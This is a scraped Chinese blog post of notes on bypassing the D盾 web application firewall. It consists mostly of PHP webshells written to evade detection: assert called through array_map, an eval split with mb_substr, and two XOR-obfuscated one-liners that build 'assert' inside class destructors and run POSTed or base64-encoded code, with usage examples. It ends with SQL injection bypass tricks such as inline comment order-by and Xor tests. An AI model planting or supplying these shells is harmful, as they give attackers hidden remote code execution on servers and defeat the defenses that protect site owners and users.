zoukankan      html  css  js  c++  java
  • 应用安全-安全设备-Waf系列-软Waf-D盾

    安装

    下载
    http://www.d99net.net/down/d_safe_2.1.5.2.zip

    使用说明

    http://www.d99net.net/News.asp?id=106

    免杀

    array_map |  assert

    <?php 
    function test($a, $b)
    {
        array_map($a, $b);
    }
    test(assert, array($_POST['x']));
    ?> 

    mb_substr

    <?php
    $m=$_GET['1'];
    $a=mb_substr($m,0,1); 
    $b=mb_substr($m,1,9999);
    eval($a.$b);
    ?>

    PHP一句话

    class LTDS
    {
        public function __destruct()
        {
            $bxo='X'^"x39";
            $woa='?'^"x4c";
            $ukt='K'^"x38";
            $gud='d'^"x1";
            $fbu='_'^"x2d";
            $agx='<'^"x48";
            $HLWV=$bxo.$woa.$ukt.$gud.$fbu.$agx;
            return @$HLWV($this->OX);
        }
    }
    $ltds=new LTDS();
    @$ltds->OX=isset($_GET['id'])?base64_decode($_POST['ua8']):$_POST['ua8'];
    
    http://www.xxx.com/shell.php  
    POST: ua8=phpinfo();  //与普通shell相同
    http://www.xxx.com/shell.php?id=xxx(xxxx随意更改)
    POST: ua8=cGhwaW5mbygpOwo=  //payload的base64编码

    异或 | PHP一句话

    <?php 
    header('HTTP/1.1 404');
    class ZXVG
    {
        public $c='';
        public function __destruct()
        {
            $_0='&'^"x47";
            $_1='C'^"x30";
            $_2='A'^"x32";
            $_3='v'^"x13";
            $_4='J'^"x38";
            $_5='f'^"x12";
            $db=$_0.$_1.$_2.$_3.$_4.$_5;
            return @$db($this->c);
        }
    }
    $zxvg=new ZXVG();
    @$zxvg->c=$_POST['mr6'];

    注入绕过

    1)
    and 1=1和and 1=22%26%26 True 和 %26%26 False
    
    (3)
    Xor True 和 Xor False 
    
    (4)
    http://127.0.0.1/sqli.php?id=1/**//*!order*//**//*!by*//**//*!1*/ #order by 内联
    5)
    union select 内联
    
    (6)
    盲注
  • 相关阅读:
    CSS中float与A标签的疑问
    常用的Css命名方式
    div css 盒子模型
    HTML初级教程 表单form
    Redis学习记录(二)
    Redis学习记录(一)
    Java源码——HashMap的源码分析及原理学习记录
    java编程基础——从上往下打印二叉树
    java编程基础——栈压入和弹出序列
    java基础编程——获取栈中的最小元素
  • 原文地址:https://www.cnblogs.com/AtesetEnginner/p/11356491.html
Copyright © 2011-2022 走看看